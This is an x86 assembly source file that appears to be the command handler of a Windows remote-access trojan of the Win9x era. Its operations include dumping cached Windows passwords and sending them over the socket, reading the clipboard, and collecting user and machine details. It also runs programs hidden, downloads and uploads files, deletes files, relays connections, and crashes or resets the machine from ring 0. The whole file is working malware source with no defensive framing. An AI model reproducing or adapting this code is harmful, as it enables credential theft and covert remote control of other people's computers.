.386P
.Model Flat ,StdCall

INCLUDE	defines.inc
INCLUDE apistruc.inc


ExceptionUsed	EQU	5	; must be same as ring0.asm


extrn	lstrcmpi	: PROC
extrn	lstrlenA	: PROC
extrn	_wsprintfA	: PROC
extrn	socket		: PROC
extrn	closesocket	: PROC
extrn	connect		: PROC
extrn	send		: PROC
extrn	GetVersionExA	: PROC
extrn	GetUserNameA	: PROC
extrn	GetComputerNameA: PROC
extrn	ExitWindowsEx	: PROC
extrn	OpenClipboard	: PROC
extrn	CloseClipboard	: PROC
extrn	GetClipboardData: PROC
extrn	LoadLibraryA	: PROC
extrn	FreeLibrary	: PROC
extrn	GetProcAddress	: PROC
extrn	ShellExecuteA	: PROC
extrn	ShowWindow	: PROC
extrn	EnumWindows	: PROC
extrn	IsWindowVisible	: PROC
extrn	GetWindowTextA	: PROC
extrn	FindWindowA	: PROC
extrn	mciSendCommandA	: PROC
extrn	SetSysColors	: PROC
extrn	SystemParametersInfoA : PROC
extrn	FindFirstFileA	: PROC
extrn	FindNextFileA	: PROC
extrn	FindClose	: PROC
extrn	CreateDirectoryA: PROC
extrn	RemoveDirectoryA: PROC
extrn	DeleteFileA	: PROC
extrn	MoveFileA	: PROC
extrn	gethostbyname	: PROC
extrn	WSAAsyncSelect	: PROC

extrn	atoi		: PROC
extrn	htoi		: PROC
extrn	RunRing0	: PROC

extrn	saddr		: SOCKADDR
extrn	ClientPtr	: DWORD
extrn	LineBuffer	: DWORD
extrn	MainWnd		: DWORD

.Data
	THE_PROGRAM_NAME	DB	PROGRAM_NAME
				DB	0

	TXT_HELP	DB	0Dh, 0Ah
		DB	'========================================================', 0Dh, 0Ah
		DB	'HELP     This help          EXIT     Quit your session', 0Dh, 0Ah
		DB	'VER      Get Versions       ExitWin  Shutdown Windows', 0Dh, 0Ah
		DB	'CLIP     View Clipboard     PASS     Display Cached Pass', 0Dh, 0Ah
		DB	'DOWNLOAD Host download file GET      Get file from host', 0Dh, 0Ah
		DB	'EXEC     ShellExecute       EXECHIDE ShellExecute', 0Dh, 0Ah
		DB	'SHOW     Show Window        HIDE     Hide Window', 0Dh, 0Ah
		DB	'MAXALL   Max all Windows    MINALL   Min all Windows', 0Dh, 0Ah
		DB	'RESTALL  Restore Windows    LISTWIN  List Windows', 0Dh, 0Ah
		DB	'DESK     Set Desktop Color  WALL     Set Wallpaper', 0Dh, 0Ah
		DB	'MKDIR    Make Directory     RMDIR    Remove Directory', 0Dh, 0Ah
		DB	'RM       Delete File        MOVE     Move / Rename File', 0Dh, 0Ah
		DB	'LS       List Directory     TELNET   Connect another', 0Dh, 0Ah
		DB	'FUNCAP   Rock the CapLock   CDROM    Open/Close cdrom', 0Dh, 0Ah
	ALINE	DB	'========================================================', 0Dh, 0Ah
	LEN_ALINE	EQU	$ - ALINE
	CRLF	DB	0Dh, 0Ah, 0
	LEN_HELP	EQU	$ - TXT_HELP

	TXT_GOODBYE	DB	'Goodbye.', 0Dh, 0Ah, 0
	LEN_GOODBYE	EQU	$-TXT_GOODBYE

	TXT_LAMEVER	DB	'%s', 0Dh, 0Ah, 0
	TXT_VERSION	DB	'OS: %s Version %d.%d.', 0Dh, 0Ah, 0
	TXT_OS		DB	'Win32', 0
			DB	'Win9x', 0
			DB	'WinNT', 0
	TXT_USERINFO	DB	'User: %s on computer: %s', 0Dh, 0Ah, 0
	TXT_UNKNOWN	DB	'UNKNOWN', 0

	osVer		LABEL	OSVERSIONINFO
	Dummy1		DD	?
	Dummy2		DD	?
	wfdata		LABEL	WIN32_FIND_DATA
	mciopen		LABEL	MCI_OPEN_PARMS
	NameBuffer	DB	70 DUP(?)
	mciset		LABEL	DWORD
	PassBuffer	DB	70 DUP(?)
			DB	WIN32_FIND_DATA_ - 140 DUP(?)

	TXT_LOGOFF	DB	'LOGOFF', 0
	TXT_REBOOT	DB	'REBOOT', 0
	TXT_PWROFF	DB	'PWROFF', 0
	TXT_FREEZE	DB	'FREEZE', 0
	TXT_RESET	DB	'RESETCPU', 0
	TXT_3XCEP	DB	'3EXCEPTION', 0
	ExitWinParaStr	DD	OFFSET TXT_LOGOFF
			DD	OFFSET TXT_REBOOT
			DD	OFFSET TXT_PWROFF
			DD	OFFSET TXT_FREEZE
			DD	OFFSET TXT_RESET
			DD	OFFSET TXT_3XCEP
	ExitWinParaVal	DD	EWX_LOGOFF+EWX_FORCE
			DD	EWX_REBOOT+EWX_FORCE
			DD	EWX_POWEROFF+EWX_FORCE

	MPR_DLL		DB	'mpr.dll', 0
	TXT_WNetEnumCachedPasswords	DB	'WNetEnumCachedPasswords', 0
	TXT_SYSPASSREZ	DB	'%d Password(s) Found.', 0Dh, 0Ah, 0Dh, 0Ah, 0


	TXT_LISTWINSTR	DB	'  [%s]', 0Dh, 0Ah, 0

	TXT_OPEN	DB	'OPEN', 0
	TXT_CLOSE	DB	'CLOSE', 0
	CdromStr	DD	OFFSET TXT_OPEN
			DD	OFFSET TXT_CLOSE
	CdromVal	DD	MCI_SET_DOOR_OPEN
			DD	MCI_SET_DOOR_CLOSED
	TXT_CDAUDIO	DB	'cdaudio', 0

	TXT_DESKTOP	DB	'New desktop color(0xBBGGRR): 0x%06X', 0Dh, 0Ah, 0
	TXT_WALLFAIL	DB	'-FAIL. Desktop wallpaper cleared.', 0Dh, 0Ah, 0Dh, 0Ah, 0
	LEN_WALLFAIL	EQU	$-TXT_WALLFAIL

	LS_FORMAT_DIR	DB	'[%17s]', 0
	LS_FORMAT_FILE	DB	' %17s ', 0

	TXT_PLAY	DB	'PLAY', 0
	TXT_STOP	DB	'STOP', 0

.Code
PUBLIC	Op_Exit
PUBLIC	Op_Help
PUBLIC	Op_Ver
PUBLIC	Op_ExitWin
PUBLIC	Op_ViewClip
PUBLIC	Op_SysPass
PUBLIC	Op_Exec
PUBLIC	Op_ExecHide
PUBLIC	Op_Download
PUBLIC	Op_Show
PUBLIC	Op_Hide
PUBLIC	Op_RestoreAll
PUBLIC	Op_MaxAll
PUBLIC	Op_MinAll
PUBLIC	Op_ListWin
PUBLIC	Op_Cdrom
PUBLIC	Op_DeskColor
PUBLIC	Op_Wall
PUBLIC	Op_Ls
PUBLIC	Op_MkDir
PUBLIC	Op_RmDir
PUBLIC	Op_Rm
PUBLIC	Op_Move
PUBLIC	Op_Get
PUBLIC	Op_Telnet
PUBLIC	Op_FunCap

;***************************************************************************************

DrawALine	PROC, s:DWORD
	call	send, s, OFFSET ALINE, LEN_ALINE, 0
	ret
DrawALine	ENDP

;***************************************************************************************

SendLine	PROC, s:DWORD
	call	lstrlenA, LineBuffer
	inc	eax
	call	send, s, LineBuffer, eax, 0
	ret
SendLine	ENDP

;***************************************************************************************

Op_Exit		PROC, client_data:DWORD, para:DWORD
	mov	esi, client_data
	call	send, [esi].sock, OFFSET TXT_GOODBYE, LEN_GOODBYE, 0
	mov	eax, OPREZ_CLOSE
	ret
Op_Exit		ENDP

;***************************************************************************************

Op_Help		PROC, client_data:DWORD, para:DWORD
	mov	esi, client_data
	call	send, [esi].sock, OFFSET TXT_HELP, LEN_HELP, 0
	mov	eax, OPREZ_OK
	ret
Op_Help		ENDP

;***************************************************************************************

Op_Ver		PROC, client_data:DWORD, para:DWORD
	mov	esi, client_data
	
	call	DrawALine, [esi].sock
	call	_wsprintfA, LineBuffer, OFFSET TXT_LAMEVER, OFFSET THE_PROGRAM_NAME
	call	SendLine, [esi].sock

	mov	osVer.ov_dwOSVersionInfoSize, OSVERSIONINFO_
	call	GetVersionExA, OFFSET osVer
	or	eax, eax
	jz	@@OpRez_Fail

	mov	edi, OFFSET TXT_OS
	mov	ebx, osVer.ov_dwPlatformId
	imul	ebx, 6
	add	edi, ebx
	
	call	_wsprintfA, LineBuffer, OFFSET TXT_VERSION, edi, osVer.ov_dwMajorVersion, osVer.ov_dwMinorVersion
	call	SendLine, [esi].sock

	mov	Dummy1, 70
	call	GetComputerNameA, OFFSET PassBuffer, OFFSET Dummy1
	or	eax, eax
	jz	@@wv_1
	push	OFFSET PassBuffer
	jmp	@@wv_2
@@wv_1:
	push	OFFSET TXT_UNKNOWN
@@wv_2:
	mov	Dummy1, 70
	call	GetUserNameA, OFFSET NameBuffer, OFFSET Dummy1
	or	eax, eax
	jz	@@wv_3
	push	OFFSET NameBuffer
	jmp	@@wv_4
@@wv_3:
	push	OFFSET TXT_UNKNOWN
@@wv_4:
	push	OFFSET TXT_USERINFO
	push	LineBuffer
	call	_wsprintfA
	call	SendLine, [esi].sock
	call	DrawALine, [esi].sock
@@OpRez_OK:
	xor	eax, eax
	ret

@@OpRez_Fail:
	mov	eax, OPREZ_FAIL
	ret
Op_Ver		ENDP

;***************************************************************************************

Op_ExitWin	PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	add	edi, 4
	mov	esi, OFFSET ExitWinParaStr
	xor	ebx, ebx
@@ExitWin_checkarg:
	push	DWORD PTR [esi+ebx]
	push	DWORD PTR [edi]
	call	lstrcmpi
	or	eax, eax
	je	@@ExitWin_doit
	add	ebx, 4
	cmp	ebx, 20
	jbe	@@ExitWin_checkarg

@@OpRez_NOARG:
	mov	eax, OPREZ_NOARG
	ret

@@ExitWin_doit:
	cmp	ebx, 12
	je	@@LockMachine
	cmp	ebx, 16
	je	@@ResetCPU
	cmp	ebx, 20
	jae	@@TripleException

	mov	esi, OFFSET ExitWinParaVal
	push	0
	push	DWORD PTR [esi+ebx]
	call	ExitWindowsEx
	or	eax, eax
	jnz	@@OpRez_Fail
	ret

@@ResetCPU:
	mov	al, 02h
	mov	dx, 0CF9h
	out	dx, al
	mov	al, 06h
	out	dx, al
	jmp	@@OpRez_Fail

@@LockMachine:
	call	RunRing0, OFFSET LockupMachine
	jmp	@@OpRez_Fail
@@TripleException:
	call	RunRing0, OFFSET TripleExcep
	jmp	@@OpRez_Fail
Op_ExitWin	ENDP

LockupMachine	PROC
	cli
	hlt
	iretd
LockupMachine	ENDP

TripleExcep	PROC
	int	ExceptionUsed
	iretd
TripleExcep	ENDP

;***************************************************************************************

Op_ViewClip	PROC, client_data:DWORD, para:DWORD
	call	OpenClipboard, NULL
	or	eax, eax
	jz	@@OpRez_Fail

	mov	esi, client_data
	call	DrawALine, [esi].sock

	call	GetClipboardData, CF_OEMTEXT
	push	eax
	push	eax
	call	CloseClipboard
	call	lstrlenA
	inc	eax

	pop	ebx
	call	send, [esi].sock, ebx, eax, 0

	call	send, [esi].sock, OFFSET CRLF, 2, 0
	call	DrawALine, [esi].sock
	xor	eax, eax
	ret
Op_ViewClip	ENDP

;***************************************************************************************

pce	PROC	pw:DWORD, s: DWORD
	push	esi

	inc	Dummy1

	mov	esi, pw
	movzx	ecx, [esi].pw_cbResource

	add	esi, 8
	mov	edi, LineBuffer
	mov	al, '['

	cld
	stosb
	rep	movsb
	mov	al, ':'
	stosb
	stosb


	mov	esi, pw
	movzx	eax, [esi].pw_cbResource
	movzx	ecx, [esi].pw_cbPassword
	add	esi, 8
	add	esi, eax
	rep	movsb
	mov	BYTE PTR [edi+1], ']'
	mov	BYTE PTR [edi+2], 0Dh
	mov	BYTE PTR [edi+3], 0Ah
	mov	BYTE PTR [edi+4], 0

	call	SendLine, s

	mov	eax, 1
	pop	esi
	ret
pce		ENDP

Op_SysPass	PROC, client_data:DWORD, para:DWORD
	call	LoadLibraryA, OFFSET MPR_DLL
	or	eax, eax
	jz	@@OpRez_Fail
	mov	Dummy2, eax

	call	GetProcAddress, eax, OFFSET TXT_WNetEnumCachedPasswords
	or	eax, eax
	jz	@@SysPass_FAIL

	push	eax
	mov	esi, client_data
	call	DrawALine, [esi].sock
	pop	edi

	mov	Dummy1, 0
	push	[esi].sock
	push	OFFSET pce
	push	0FFh
	push	0
	push	0
	call	edi

	call	DrawALine, [esi].sock
	call	_wsprintfA, LineBuffer, OFFSET TXT_SYSPASSREZ, Dummy1
	call	SendLine, [esi].sock

@@SysPass_FAIL:
	call	FreeLibrary, Dummy2
	mov	eax, OPREZ_NOTHING
	ret
Op_SysPass	ENDP

;***************************************************************************************

Op_Execute	PROC, para:DWORD, flag:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@Exec_NOARG

	call	ShellExecuteA, NULL, NULL, DWORD PTR [edi+4], DWORD PTR [edi+8], NULL, flag
	cmp	eax, 32
	jbe	@@Exec_FAIL
	xor	eax, eax
	ret

@@Exec_NOARG:
	mov	eax, OPREZ_NOARG
	ret
@@Exec_FAIL:
	mov	eax, OPREZ_FAIL
	ret
Op_Execute	ENDP

Op_Exec		PROC, client_data:DWORD, para:DWORD
	call	Op_Execute, para, SW_SHOW
	ret
Op_Exec		ENDP

Op_ExecHide	PROC, client_data:DWORD, para:DWORD
	call	Op_Execute, para, SW_HIDE
	ret
Op_ExecHide	ENDP

;***************************************************************************************

extrn	HttpGetFile	: PROC
; HttpGetFile	PROC, url:DWORD, saveas:DWORD, exeflag:DWORD

Op_Download	PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 3
	jb	@@OpRez_NOARG

	mov	esi, [edi+12]
	call	htoi
	push	ebx
	push	DWORD PTR [edi+8]
	push	DWORD PTR [edi+4]
	call	HttpGetFile
	cmp	eax, -1
	je	@@OpRez_Fail
	xor	eax, eax
	ret
Op_Download	ENDP

;***************************************************************************************

EnumWinProc	PROC, hwnd:DWORD, lParam:DWORD
	CALL	IsWindowVisible, hwnd
	or	eax, eax
	jz	@@ewp_done
	call	GetWindowTextA, hwnd, LineBuffer, 79
	or	eax, eax
	jz	@@ewp_done
	call	ShowWindow, hwnd, lParam
@@ewp_done:
	mov	eax, 1
	ret
EnumWinProc	ENDP

Op_ShowWindow	PROC, flag:DWORD
	call	EnumWindows, OFFSET EnumWinProc, flag
	or	eax, eax
	jz	@@ShowWindow_FAIL
	xor	eax, eax
	ret
@@ShowWindow_FAIL:
	mov	eax, OPREZ_FAIL
	ret
Op_ShowWindow	ENDP

Op_RestoreAll	PROC, client_data:DWORD, para:DWORD
	call	Op_ShowWindow, SW_RESTORE
	ret
Op_RestoreAll	ENDP

Op_MaxAll	PROC, client_data:DWORD, para:DWORD
	call	Op_ShowWindow, SW_MAXIMIZE
	ret
Op_MaxAll	ENDP

Op_MinAll	PROC, client_data:DWORD, para:DWORD
	call	Op_ShowWindow, SW_MINIMIZE
	ret
Op_MinAll	ENDP

;***************************************************************************************

EnumWinProc2	PROC, hwnd:DWORD, lParam:DWORD
	CALL	IsWindowVisible, hwnd
	or	eax, eax
	jz	@@ewp2_done
	call	GetWindowTextA, hwnd, OFFSET NameBuffer, 79
	or	eax, eax
	jz	@@ewp2_done
	call	_wsprintfA, LineBuffer, OFFSET TXT_LISTWINSTR, OFFSET NameBuffer
	call	SendLine, lParam
@@ewp2_done:
	mov	eax, 1
	ret
EnumWinProc2	ENDP

Op_ListWin	PROC, client_data:DWORD, para:DWORD
	mov	esi, client_data
	call	DrawALine, [esi].sock
	call	EnumWindows, OFFSET EnumWinProc2, [esi].sock
	push	eax
	call	DrawALine, [esi].sock
	pop	eax
	or	eax, eax
	jz	@@OpRez_Fail
	xor	eax, eax
	ret
Op_ListWin	ENDP

;***************************************************************************************

Op_SetWindowVisible	PROC, cap:DWORD, flag:DWORD
	call	FindWindowA, NULL, cap
	or	eax, eax
	jz	@@swv_FAIL
	call	ShowWindow, eax, flag
	xor	eax, eax
	ret
@@swv_FAIL:
	mov	eax, OPREZ_FAIL
	ret
Op_SetWindowVisible	ENDP

Op_Show		PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG
	add	edi, 4
	call	Op_SetWindowVisible, DWORD PTR [edi], SW_SHOW
	ret
Op_Show		ENDP

Op_Hide		PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG
	add	edi, 4
	call	Op_SetWindowVisible, DWORD PTR [edi], SW_HIDE
	ret
Op_Hide		ENDP

;***************************************************************************************

Op_Cdrom	PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	mov	esi, OFFSET CdromStr
	xor	ebx, ebx
	add	edi, 4
@@cdrom_checkarg:
	call	lstrcmpi, DWORD PTR [edi], DWORD PTR [esi+ebx]
	or	eax, eax
	je	@@cdrom_doit
	add	ebx, 4
	cmp	ebx, 4
	jbe	@@cdrom_checkarg
	jmp	@@OpRez_NOARG

@@cdrom_doit:
	mov	Dummy1, ebx

	mov	edi, OFFSET mciopen
	mov	DWORD PTR [edi], 0
	mov	DWORD PTR [edi+4], 0
	mov	DWORD PTR [edi+8], OFFSET TXT_CDAUDIO
	mov	DWORD PTR [edi+12], 0
	mov	DWORD PTR [edi+16], 0
	call	mciSendCommandA, 0, MCI_OPEN, MCI_OPEN_TYPE+MCI_OPEN_SHAREABLE, edi
	or	eax, eax
	jnz	@@OpRez_Fail

	mov	edi, OFFSET mciset
	mov	DWORD PTR [edi], 0
	mov	DWORD PTR [edi+4], 0
	mov	DWORD PTR [edi+8], 0

	mov	esi, OFFSET CdromVal
	add	esi, Dummy1
	mov	eax, MCI_SET_OFF
	add	eax, [esi]
	call	mciSendCommandA, mciopen.mci_wDeviceID, MCI_SET, eax, edi
	push	eax

	mov	Dummy1, 0
	call	mciSendCommandA, mciopen.mci_wDeviceID, MCI_CLOSE, MCI_WAIT, OFFSET Dummy1

	pop	eax
	or	eax, eax
	jnz	@@OpRez_Fail
	xor	eax, eax
	ret
Op_Cdrom	ENDP

;***************************************************************************************

Op_DeskColor	PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	mov	esi, [edi+4]
	call	htoi
	mov	Dummy1, COLOR_BACKGROUND
	mov	Dummy2, ebx
	call	SetSysColors, 1, OFFSET Dummy1, OFFSET Dummy2
	or	eax, eax
	jz	@@OpRez_Fail

	call	_wsprintfA, LineBuffer, OFFSET TXT_DESKTOP, Dummy2
	mov	esi, client_data
	call	SendLine, [esi].sock
	xor	eax, eax
	ret
Op_DeskColor	ENDP

;***************************************************************************************

Op_Wall		PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	call	SystemParametersInfoA, SPI_SETDESKWALLPAPER, 0, DWORD PTR [edi+4], SPIF_UPDATEINIFILE
	or	eax, eax
	jz	@@wall_fail
	xor	eax, eax
	ret
@@wall_fail:
	mov	esi, client_data
	call	send, [esi].sock, OFFSET TXT_WALLFAIL, LEN_WALLFAIL, 0
	mov	eax, OPREZ_NOTHING
	ret
Op_Wall		ENDP

;***************************************************************************************

Op_Ls		PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	mov	esi, client_data
	call	DrawALine, [esi].sock

	call	FindFirstFileA, DWORD PTR [edi+4], OFFSET wfdata
	cmp	eax, INVALID_HANDLE_VALUE
	je	@@ls_done

	mov	Dummy1, eax
	mov	Dummy2, 0

@@ls_loop:
	cmp	Dummy2, 4
	jne	@@ls_0
	call	send, [esi].sock, OFFSET CRLF, 2, 0
	mov	Dummy2, 0
@@ls_0:
	inc	Dummy2
	push	OFFSET wfdata.fd_cFileName
	test	wfdata.fd_dwFileAttributes, FILE_ATTRIBUTE_DIRECTORY
	jz	@@ls_file
	push	OFFSET LS_FORMAT_DIR
	jmp	@@ls_1
@@ls_file:
	push	OFFSET LS_FORMAT_FILE
@@ls_1:
	push	LineBuffer
	call	_wsprintfA
	call	SendLine, [esi].sock

	call	FindNextFileA, Dummy1, OFFSET wfdata
	or	eax, eax
	jnz	@@ls_loop

	call	FindClose, Dummy1
@@ls_done:
	call	send, [esi].sock, OFFSET CRLF, 2, 0
	call	DrawALine, [esi].sock
	xor	eax, eax
	ret
Op_Ls		ENDP

;***************************************************************************************

Op_MkDir	PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	call	CreateDirectoryA, DWORD PTR [edi+4], 0
	or	eax, eax
	jz	@@OpRez_Fail
	xor	eax, eax
	ret
Op_MkDir	ENDP

Op_RmDir	PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	call	RemoveDirectoryA, DWORD PTR [edi+4]
	or	eax, eax
	jz	@@OpRez_Fail
	xor	eax, eax
	ret
Op_RmDir	ENDP

Op_Rm		PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	call	DeleteFileA, DWORD PTR [edi+4]
	or	eax, eax
	jz	@@OpRez_Fail
	xor	eax, eax
	ret
Op_Rm	ENDP

Op_Move		PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 3
	jb	@@OpRez_NOARG

	call	MoveFileA, DWORD PTR [edi+4], DWORD PTR [edi+8]
	or	eax, eax
	jz	@@OpRez_Fail
	xor	eax, eax
	ret
Op_Move	ENDP

;***************************************************************************************

extrn	SendFile : PROC
; SendFile	PROC, file:DWORD, ipaddress:DWORD, port:DWORD

Op_Get		PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 3
	jb	@@OpRez_NOARG

	mov	esi, [edi+8]
	call	atoi

	mov	esi, client_data
	mov	eax, DWORD PTR [esi].addr.sa_data[2]
	cmp	DWORD PTR [edi+12], 0
	je	@@GET_AutoIP

	call	gethostbyname, DWORD PTR [edi+12]
	or	eax, eax
	jz	@@OpRez_Fail

	mov	esi, [eax].h_addr
	mov	esi, [esi]
	mov	eax, [esi]

@@GET_AutoIP:
	call	SendFile, DWORD PTR [edi+4], eax, ebx
	cmp	eax, -1
	je	@@OpRez_Fail
	xor	eax, eax
	ret
Op_Get		ENDP	

;***************************************************************************************

Op_Telnet	PROC, client_data:DWORD, para:DWORD
	mov	Dummy2, eax

	mov	edi, para
	cmp	[edi].argc, 3
	jb	@@OpRez_NOARG

	push	DWORD PTR [edi+4]
	call	gethostbyname
	or	eax, eax
	jz	@@OpRez_Fail

	mov	esi, [eax].h_addr
	mov	esi, [esi]
	mov	eax, [esi]
	mov	DWORD PTR saddr.sa_data[2], eax

	mov	esi, [edi+8]
	call	atoi

	mov	BYTE PTR saddr.sa_data[0], bh
	mov	BYTE PTR saddr.sa_data[1], bl
	mov	saddr.sa_family, AF_INET

	call	socket, AF_INET, SOCK_STREAM, IPPROTO_TCP
	cmp	eax, -1
	je	@@OpRez_Fail
	mov	Dummy1, eax

	call	connect, eax, OFFSET saddr, SOCKADDR_
	cmp	eax, SOCKET_ERROR
	je	@@Telnet_Fail_Close

	mov	eax, MSG_TELNET
	add	eax, Dummy2

	call	WSAAsyncSelect, Dummy1, MainWnd, eax, FD_READ+FD_CLOSE
	cmp	eax, SOCKET_ERROR
	je	@@Telnet_Fail_Close

	mov	edi, client_data
	mov	eax, Dummy1
	mov	[edi].telnet_sock, eax
	xor	eax, eax
	ret

@@Telnet_Fail_Close:
	call	closesocket, Dummy1
	jmp	@@OpRez_Fail
Op_Telnet	ENDP

;***************************************************************************************

extrn	PlayKeybLight	: PROC
extrn	StopKeybLight	: PROC
Op_FunCap	PROC, client_data:DWORD, para:DWORD
	mov	edi, para
	cmp	[edi].argc, 2
	jb	@@OpRez_NOARG

	call	lstrcmpi, DWORD PTR [edi+4], OFFSET TXT_PLAY
	or	eax, eax
	je	@@PlayKeyb
	call	lstrcmpi, DWORD PTR [edi+4], OFFSET TXT_STOP
	or	eax, eax
	jne	@@OpRez_NOARG
@@StopKeyb:
	call	StopKeybLight
	xor	eax, eax
	ret
@@PlayKeyb:
	call	PlayKeybLight
	xor	eax, eax
	ret
Op_FunCap	ENDP
	

END